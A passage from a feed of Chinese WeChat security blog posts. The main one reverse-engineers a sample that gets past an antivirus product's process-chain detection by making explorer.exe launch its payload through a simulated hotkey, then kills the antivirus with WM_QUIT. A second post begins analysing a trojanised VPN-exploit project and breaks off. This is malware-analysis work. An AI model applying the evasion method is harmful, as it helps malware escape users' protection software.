style="mso-spacerun:&#39;yes&#39;;font-size:11.25pt;">早些时候有⼈⽤Vmware的exe进⾏测试，遇到了进程链检测的问题。如果是⼿动点击启动的带虚拟化功能的相关exe，核晶将进⼊“⾃适应”状态，此时的⽗进程是explorer.exe；如果通过⾃⼰的⽊⻢或是什么东⻄使⽤诸如CreateProcess或ShellExecute等常规⽅法则会爆出弹窗。<br/></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.565359477124183" data-s="300,640" style="" data-type="png" data-w="918" src="https://wechat2rss.xlab.app/img-proxy/?k=f6305d38&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9cpiaM5OlERfVNiarg1XAWR7AULkDGa6PIpsouaN6hV0LPBD28eyicDnEUcBUcXKRicuyk5W2AfNkwIiaA%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="mso-spacerun:&#39;yes&#39;;font-size:11.25pt;">之后开始使⽤exlorer.exe start xxx.exe来过⽗进程检测不久之后⼜被拦截；在之后就把explorer.exe的资源做替换名字修改来过⽗进程不久之后⼜被拦截；在之后不仅替换资源⼜加了upx壳不久后⼜不好使了；以上操作不在此⼀⼀展示。最近拿到了⼀个样本，对其进⾏逆向分析后发现新的办法！<br/></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="1.5114854517611025" data-s="300,640" style="" data-type="png" data-w="653" src="https://wechat2rss.xlab.app/img-proxy/?k=a7ca62b6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9cpiaM5OlERfVNiarg1XAWR7AtZoFWHf0Ax6TnZEbRKla9UcQdqjIM4duwOyldMvZKSBMiaT0Hevibpicg%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="mso-spacerun:&#39;yes&#39;;font-size:11.25pt;">先使⽤IDA静态分析⼤致看下运⾏逻辑。<br/></span></p><p><span style="mso-spacerun:&#39;yes&#39;;font-size:11.25pt;">很明显dllmain直接就启动了⼀个线程。很显然这么做并不合适，因为会导致线程死锁导致线程没法继续往下⾛。<br/></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.9532619279454723" data-s="300,640" style="" data-type="png" data-w="1027" src="https://wechat2rss.xlab.app/img-proxy/?k=f2ac0bb4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9cpiaM5OlERfVNiarg1XAWR7Aodu5xePNMD0xdUJFOWSP4l3RC0HfPn1jby73PAJRrnLWSECYrILibrA%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="mso-spacerun:&#39;yes&#39;;font-size:11.25pt;">再去看看导出函数。</span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.1928374655647383" data-s="300,640" style="" data-type="png" data-w="726" src="https://wechat2rss.xlab.app/img-proxy/?k=70e42d48&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9cpiaM5OlERfVNiarg1XAWR7AbeAPlicCficdpoxXiazW7HeKIJBZCIb206Cl1eI688OQ9MDUusPZ4wiaBg%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="mso-spacerun:&#39;yes&#39;;font-size:11.25pt;">⼤致看了下，run函数是我们想要的内容。</span></p><p><span style="mso-spacerun:&#39;yes&#39;;font-size:11.25pt;">也是启动⼀个线程。</span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="1.0723684210526316" data-s="300,640" style="" data-type="png" data-w="608" src="https://wechat2rss.xlab.app/img-proxy/?k=24e7543d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9cpiaM5OlERfVNiarg1XAWR7AKMFwbSPiaM8MN3jJpkkibicQ1ibcPtwt6C1Hsib9g5voVSvmZletJibLicVLA%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="mso-spacerun:&#39;yes&#39;;font-size:11.25pt;">跟进线程起始地址分析代码。可以看到它先是sleep⼀下就检测⼀个字符串指针指向地址处的字符串⻓度，若⻓度不为12就往0地址处复制内存，显然这样会触发内存读写异常导致程序崩溃，此处⼜⼀处暗桩。然后就向C:\ProgramData⽬录释放可能占⽤VT的exe。<br/></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.379746835443038" data-s="300,640" style="" data-type="png" data-w="1027" src="https://wechat2rss.xlab.app/img-proxy/?k=835407b4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9cpiaM5OlERfVNiarg1XAWR7Adkfp0WoqibvlGakgCOj2gfxoEuTwE0OkibwycfIO0BMPSZC63tgELdnw%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="mso-spacerun:&#39;yes&#39;;font-size:11.25pt;">让我们来看看这个wegame.exe是怎么启动并绕过进程链检测的。<br/></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="1.1890909090909092" data-s="300,640" style="" data-type="png" data-w="825" src="https://wechat2rss.xlab.app/img-proxy/?k=bb1fa080&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9cpiaM5OlERfVNiarg1XAWR7AyTZZrhj576UanwSlS16BFU9CKveUcAjBp0u19vLd4GvTgOahoFC6cg%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="mso-spacerun:&#39;yes&#39;;font-size:11.25pt;">先是执⾏了sub_10001100函数，之后找到窗⼝类Shell_TrayWnd使⽤PostMessageW发送10次特定消息，然后模拟键盘事件Ctrl+Alt+A（推测此处是某快捷键），之后在sub_10001000函数返回为0的前提下继续模拟键盘事件。我们来看看这两个函数到底做了什么。</span></p><p><span style="mso-spacerun:&#39;yes&#39;;font-size:11.25pt;">第⼀个函数⼜跳到了sub_10001110，它遍历了进程链表，找到qq.exe并使⽤TerminateProcess终结qq.exe。推测可能是qq的快捷键占⽤了Ctrl+Alt+A。<br/></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.7395121951219512" data-s="300,640" style="" data-type="png" data-w="1025" src="https://wechat2rss.xlab.app/img-proxy/?k=0efbf48f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9cpiaM5OlERfVNiarg1XAWR7AmLMbhhIr34om8jyAlkRBqrgNrcPtQ25lwWvqicafKRnoZNywtwKdic8Q%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="mso-spacerun:&#39;yes&#39;;font-size:11.25pt;">第⼆个函数则是判断wegame.exe是否已经运⾏。</span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="1.1009174311926606" data-s="300,640" style="" data-type="png" data-w="763" src="https://wechat2rss.xlab.app/img-proxy/?k=49ac348e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9cpiaM5OlERfVNiarg1XAWR7ACvkcVWqF1bTviazAwsKgJg5KNTCJPhARBP61iaruZo2flhrF47jc0f6A%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="mso-spacerun:&#39;yes&#39;;font-size:11.25pt;">⾃此我们已经看过wegame的启动过程，现在动态调试来看⼀下。不过在此之前我们需要patch掉原有的俩暗桩。</span></p><p><span style="mso-spacerun:&#39;yes&#39;;font-size:11.25pt;">⾸先是dllmain我们不能让他启动线程，所以将此处跳转改为强制跳转。<br/></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.5668292682926829" data-s="300,640" style="" data-type="png" data-w="1025" src="https://wechat2rss.xlab.app/img-proxy/?k=d484104b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9cpiaM5OlERfVNiarg1XAWR7AorB0rlXn1sYDx1KHjF4PxYib0cN2suu3opLTiaG9QBJ9Y14hmQCpt8icA%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="mso-spacerun:&#39;yes&#39;;font-size:11.25pt;">同理此处也改为强制跳转。<br/></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.5452775073028238" data-s="300,640" style="" data-type="png" data-w="1027" src="https://wechat2rss.xlab.app/img-proxy/?k=f6925c6d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9cpiaM5OlERfVNiarg1XAWR7AYPMoSoyUdLiaLsVtbm4GakAU0AppMxdjCabW91x2pn7pj1rbvnia04mQ%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="mso-spacerun:&#39;yes&#39;;font-size:11.25pt;">然后写个exe来辅助调试这个dll⽂件。</span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.35488308115543327" data-s="300,640" style="" data-type="png" data-w="727" src="https://wechat2rss.xlab.app/img-proxy/?k=a06c2d63&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9cpiaM5OlERfVNiarg1XAWR7AJPW5fhxsrVBskfNFKxic9ZDNia8DfkQLQHZWWxFHMFrSD4hN6oOjbrpA%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="mso-spacerun:&#39;yes&#39;;font-size:11.25pt;">载⼊运⾏直接就来到了我们的int 3断点。</span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.4794921875" data-s="300,640" style="" data-type="png" data-w="1024" src="https://wechat2rss.xlab.app/img-proxy/?k=f2fe8e2c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9cpiaM5OlERfVNiarg1XAWR7ATODyicedm1Sd0lQJZibylZw6KZTeicYJjbrnfxoCTfcl720eVibCaFiawNQ%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="mso-spacerun:&#39;yes&#39;;font-size:11.25pt;">nop掉继续往下⾛找到jmp地址。<br/></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.4941747572815534" data-s="300,640" style="" data-type="png" data-w="1030" src="https://wechat2rss.xlab.app/img-proxy/?k=1a65f7e0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9cpiaM5OlERfVNiarg1XAWR7ApzMApOIFaQNQYaqibzGIJvqed1ROpsazKzDKYmxu2cIc8vpY7iaibZWZA%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="mso-spacerun:&#39;yes&#39;;font-size:11.25pt;">从CreateThread的参数找到run函数地址并下断点。</span></p><p><span style="mso-spacerun:&#39;yes&#39;;font-size:11.25pt;">运⾏成功来到断点往下执⾏，执⾏完向窗⼝类的Shell_TrayWnd的PostMessageW后，此时⽂件已经释放，⽽且还注册了快捷键。<br/></span></p><p style="text-align: left;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.47623666343355964" data-s="300,640" style="" data-type="png" data-w="1031" src="https://wechat2rss.xlab.app/img-proxy/?k=6542aa32&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9cpiaM5OlERfVNiarg1XAWR7AaZUHBEoKxk7SiaCGOPc9eR8td2yYkuYpbsFVonIqp7tpxz0RiajOMichA%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.4766990291262136" data-s="300,640" style="" data-type="png" data-w="1030" src="https://wechat2rss.xlab.app/img-proxy/?k=2b96c561&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9cpiaM5OlERfVNiarg1XAWR7ARcLOEZcYo2fTdJcJPK5zVOhdWfS84Qia9TicEcMULpMPibulJ7vVFicbuw%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="mso-spacerun:&#39;yes&#39;;font-size:11.25pt;">之后通过keybd_event模拟快捷键启动wegame.exe，⽗进程explorer。这种就相当于explorer启动的wegame.exe，进程链⽆从查起。<br/></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.4776264591439689" data-s="300,640" style="" data-type="png" data-w="1028" src="https://wechat2rss.xlab.app/img-proxy/?k=9d573906&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9cpiaM5OlERfVNiarg1XAWR7Au0b2eicad05rum6uJvDSUYplFzU4VbgJ6bnwibL5E1el8TCCrcGSQRSA%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="mso-spacerun:&#39;yes&#39;;font-size:11.25pt;">打开某数字发现已经“⾃适应”。<br/></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.5" data-s="300,640" style="" data-type="png" data-w="1024" src="https://wechat2rss.xlab.app/img-proxy/?k=7a615e93&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9cpiaM5OlERfVNiarg1XAWR7ABKmpuF67wbJyFy5JSy8icfhq6MNKWIt1Ash3AxRiawX5pZHQjXFeRjlA%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="mso-spacerun:&#39;yes&#39;;font-size:11.25pt;">之后找到某数字窗⼝类发送WM_QUIT消息kill掉进程。</span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.6347569955817378" data-s="300,640" style="" data-type="png" data-w="679" src="https://wechat2rss.xlab.app/img-proxy/?k=c597e4c6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9cpiaM5OlERfVNiarg1XAWR7AOSu3jRl3gcSaqoxiavdtKJkw9p71Ok1vyH5jazxtFZ4zUqC2dz7hUWA%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="mso-spacerun:&#39;yes&#39;;font-size:11.25pt;">为了详细了解这⼀过程我们继续分析explorer.exe创建进程的过程。调试它并对NtCreateUserProcess下断点，⼿动执⾏快捷键触发断点，开来已经来到正确位置。<br/></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.47568093385214005" data-s="300,640" style="" data-type="png" data-w="1028" src="https://wechat2rss.xlab.app/img-proxy/?k=270fb6f7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9cpiaM5OlERfVNiarg1XAWR7AjuxklbceFP2XOfWjPAicNia45pCicCzdka6RkSXPNPI0KjckprJ56nhdg%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="mso-spacerun:&#39;yes&#39;;font-size:11.25pt;">查看调⽤栈。<br/></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.46529814271749753" data-s="300,640" style="" data-type="png" data-w="1023" src="https://wechat2rss.xlab.app/img-proxy/?k=c12a50d8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9cpiaM5OlERfVNiarg1XAWR7AtlicNia32TyAIiaDSQiaSia38EjMKLfh6rv4vB6XjicQmfzibhRq6bqO7n1Rw%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="mso-spacerun:&#39;yes&#39;;font-size:11.25pt;">最后可简化为</span></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="cpp"><code><span class="code-snippet_outer">SHELL32!HDXA_LetHandlerProcessCommandEx+<span class="code-snippet__number">0x10c</span></span></code><code><span class="code-snippet_outer">SHELL32!CDefFolderMenu::InvokeCommand+<span class="code-snippet__number">0x13d</span> shlwapi!SHInvokeCommandOnContextMenu2+<span class="code-snippet__number">0x1f2</span></span></code><code><span class="code-snippet_outer">shlwapi!SHInvokeCommandWithFlagsAndSite+<span class="code-snippet__number">0xb4</span></span></code><code><span class="code-snippet_outer">shlwapi!SHInvokeDefaultCommand+<span class="code-snippet__number">0x21</span> Explorer!_ExecItemByPidls+<span class="code-snippet__number">0x85</span> Explorer!CTray::_HotkeySearchFailed+<span class="code-snippet__number">0xd5</span></span></code><code><span class="code-snippet_outer">Explorer!CTray::v_WndProc+<span class="code-snippet__number">0xb96</span> Explorer!CImpWndProc::s_WndProc+<span class="code-snippet__number">0x78</span></span></code><code><span class="code-snippet_outer">user32!UserCallWinProcCheckWow+<span class="code-snippet__number">0x2f8</span></span></code><code><span class="code-snippet_outer">user32!CallWindowProcW+<span class="code-snippet__number">0x8e</span></span></code></pre></section><p><span style="mso-spacerun:&#39;yes&#39;;font-size:11.25pt;">很明显由是由HotkeySearchFailed函数调⽤ExecItemByPidls来执⾏快捷⽅式，这两个函数的后续深度逆向分析在此不做赘述。在IDA⾥对explorer的registerHotKey进⾏交叉引⽤找到这个函数似乎是处理消息的。<br/></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.7308066083576288" data-s="300,640" style="" data-type="png" data-w="1029" src="https://wechat2rss.xlab.app/img-proxy/?k=ed437771&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9cpiaM5OlERfVNiarg1XAWR7ATf0GSoCjFGpJQNgVwibvFeQPhriaFpAJRZoRA3IsUXic245VFgiaJaGThQ%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="mso-spacerun:&#39;yes&#39;;font-size:11.25pt;">往下⾛找到样本发送的Msg值0x4EA、0x4E9。并且当值为0x4E6时也会进⾏注册热键操作。<br/></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.6592015579357352" data-s="300,640" style="" data-type="png" data-w="1027" src="https://wechat2rss.xlab.app/img-proxy/?k=839281d0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9cpiaM5OlERfVNiarg1XAWR7AKibpyq1G8VXwWty5gibXBlicWW5cuiaCdYC71avHLjzCHjsmqs0UXExz6Q%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="mso-spacerun:&#39;yes&#39;;font-size:11.25pt;">如0x4E9处sub_140107194-&gt;sub_14010656C-&gt;RegisterHotKey<br/></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.7752918287937743" data-s="300,640" style="" data-type="png" data-w="1028" src="https://wechat2rss.xlab.app/img-proxy/?k=448fa3a3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9cpiaM5OlERfVNiarg1XAWR7AekbrTKnaJFcOPhPTFg2xVWwKDUXDiaBF8qc5INmNRU745QZnpXASxMw%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="mso-spacerun:&#39;yes&#39;;font-size:11.25pt;">更加多样化的利⽤思路就交给⼴⼤⽩帽⼦吧。</span></p><p><span style="mso-spacerun:&#39;yes&#39;;font-size:11.25pt;">ps：想说一句，放眼世界吧。不见下edr不懂啥叫杀软。不对抗下xdr不明白世界有多大。天天就会对抗个某数字能干啥？？<br/></span></p><p style="text-align: center;visibility: visible;">欢迎各位大佬入群交流，需要各种资料也可入群领取。</p><p style="text-align: center;"><span style="color: rgb(255, 0, 0);">二维码失效加好友进群！！！！！！！！！！！<br/></span></p><p style="text-align: center;"><span style="color: rgb(255, 0, 0);">群满请加wx入群！！！！！！！</span></p><p style="text-align: center;"><span style="color: rgb(255, 0, 0);">wx：Mathearsion</span><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><br/></span></p><p><span style="mso-spacerun:&#39;yes&#39;;font-size:11.25pt;"></span></p><p><span style="mso-spacerun:&#39;yes&#39;;font-size:11.25pt;"></span></p><p><span style="mso-spacerun:&#39;yes&#39;;font-size:11.25pt;"></span></p><p><span style="mso-spacerun:&#39;yes&#39;;font-size:11.25pt;"></span></p><p><span style="mso-spacerun:&#39;yes&#39;;font-size:11.25pt;"></span></p><p><span style="mso-spacerun:&#39;yes&#39;;font-size:11.25pt;"></span></p><p><span style="mso-spacerun:&#39;yes&#39;;font-size:11.25pt;"></span></p><p><span style="mso-spacerun:&#39;yes&#39;;font-size:11.25pt;"><br/></span></p><p><span style="mso-spacerun:&#39;yes&#39;;font-size:11.25pt;"></span></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247483964">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=431b2319&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzk0ODUxNzgyOQ%3D%3D%26mid%3D2247483964%26idx%3D1%26sn%3Db8fa3f291accf6a7529059f764279892%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Thu, 31 Aug 2023 16:10:00 +0800</pubDate>
    </item>
    <item>
      <title>奇某信VPN溢出钓鱼项目分析</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzk0ODUxNzgyOQ==&amp;mid=2247483929&amp;idx=1&amp;sn=a4248599546b0f73a2e2d3e21baee3bf</link>
      <description>bt不想rt活啊，钓鱼下这猛料。今天兄弟又给了个小项目，直接奇xxvpn利用？？？怕了啊，公司瑟瑟发抖htt</description>
      <content:encoded><![CDATA[<p>
原创 <span>41group</span> <span>2023-08-16 02:57</span> <span style="display: inline-block;">安徽</span>
</p>

<p>bt不想rt活啊，钓鱼下这猛料。今天兄弟又给了个小项目，直接奇xxvpn利用？？？怕了啊，公司瑟瑟发抖htt</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=0454f249&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FJfZvTUw4J9fHKuEzmDvHFgTDCCu63LEJuljibU94Y8YEc0Sf6x0HySOictibyhBHu65KABPhxfs4NbZ5YibicbN9LYg%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p>bt不想rt活啊，钓鱼下这猛料。今天兄弟又给了个小项目，直接奇xxvpn利用？？？怕了啊，公司瑟瑟发抖<br/></p><p><a href="https://github.com/CyberSnakeSec/xaq-vpn-pwn" target="_blank">https://github.com/CyberSnakeSec/xaq-vpn-pwn</a></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.6685185185185185" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=43234317&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fHKuEzmDvHFgTDCCu63LEJ6ngVHrz3jGuUHDUWicrxnia9TicJTC8ftMRA5GeY0408HVwcoFMU5UY4w%2F640%3Fwx_fmt%3Dpng"/></p><p>兄弟文章我先发了，如果分析有误，我千字文给你道歉。</p><p>正文开始</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.5574074074074075" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=d29ffa02&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fHKuEzmDvHFgTDCCu63LEJic49pCg2vgibxYhZleWKibqo8SkzghiaaSTeV6RAia1aIfIAQqsJQCR2xaQ%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:宋体;">项目结构</span></span></p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.5222222222222223" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=b519399a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fHKuEzmDvHFgTDCCu63LEJEkEgbh28EH1l2g1TkQraKwiaYGbh89NdrFoWQxeHEdaMKcmmCp05wNQ%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:宋体;">拆包后内容</span><br/></span></p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.06236323851203501" data-s="300,640" style="" data-type="png" data-w="914" src="https://wechat2rss.xlab.app/img-proxy/?k=3ec1403e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fHKuEzmDvHFgTDCCu63LEJdGXCln8SsnswAiaksMib7Fpqu9I6ntEkALKZzpriaMEiaQ0rALPYHPf7lA%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:宋体;">全局搜索存在两个入口类，看名称先从</span><span style="font-family:Calibri;">pwd.class</span><span style="font-family:宋体;">看起</span></span></p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.4648148148148148" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=ab0bcaf5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fHKuEzmDvHFgTDCCu63LEJqibU2j3GAhmkibjvEk9Dr6eRdiaTWt1JIURoFYtAw3T1VlXXbn2DshOuA%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:宋体;">代码不长，通篇大量混淆后字符串，和前几天分析哥斯拉插件钓鱼异曲同工。</span></span></p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.06060606060606061" data-s="300,640" style="" data-type="png" data-w="627" src="https://wechat2rss.xlab.app/img-proxy/?k=5989644e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fHKuEzmDvHFgTDCCu63LEJzjSDh1WXHYFKRZbNWb8oo7tQuI3yDUECKl1EX1ZYECZaVjhJYdzfcQ%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:宋体;">使用</span><span style="font-family:Calibri;">ALLATORIxDEMO</span><span style="font-family:宋体;">解密混淆代码。</span><span style="font-family:Calibri;">ALLATORIxDEMO</span><span style="font-family:宋体;">和哥斯拉的也一个叼样</span></span></p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.9503891050583657" data-s="300,640" style="" data-type="png" data-w="1028" src="https://wechat2rss.xlab.app/img-proxy/?k=8502f483&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fHKuEzmDvHFgTDCCu63LEJb38wMAHy1xTqPkLicvKRc7M7kBGMnXhZS57XO3ibia92remrhibM3qAOvw%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:宋体;">总的来说这段代码是入口类，先对一系列字符串解密并输出，然后解析命令行参数数组，获取特定的参数，并根据参数执行相应参数。</span></span></p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.5296296296296297" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=c4abbb83&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fHKuEzmDvHFgTDCCu63LEJo7cKvD4xazRxyhqWFHMZia5OpzZnWl5nwS7ZAbye41zXmncdVY4RxFQ%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:宋体;">解密之后发现其是项目说明等，继续深扒详细功能。</span></span></p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.11037891268533773" data-s="300,640" style="" data-type="png" data-w="607" src="https://wechat2rss.xlab.app/img-proxy/?k=691914a0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fHKuEzmDvHFgTDCCu63LEJmRgJfsf7SGjAXsicoGuCicCr3O5EhBquVWyeAyU9fEQMKNNUjic5R3Qnw%2F640%3Fwx_fmt%3Dpng"/></p><p><span 